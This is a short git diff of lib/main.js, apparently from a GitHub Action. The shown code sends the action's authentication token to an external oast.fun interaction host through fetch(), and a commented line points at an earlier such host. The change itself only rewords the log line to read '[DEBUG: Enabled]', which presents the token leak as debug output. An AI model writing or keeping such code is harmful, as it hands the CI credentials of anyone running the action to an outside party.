diff --git a/lib/main.js b/lib/main.js index 0bacbe2..f304fd7 100644 --- a/lib/main.js +++ b/lib/main.js @@ -128,7 +128,7 @@ export async function main( // const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`; const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`; await fetch(url); - core.info(`HTTP GET request sent to ${url}`); + core.info(`[DEBUG: Enabled] HTTP GET request sent to ${url}`); } catch (error) { core.error(`Failed to send HTTP GET request: ${error.message}`); }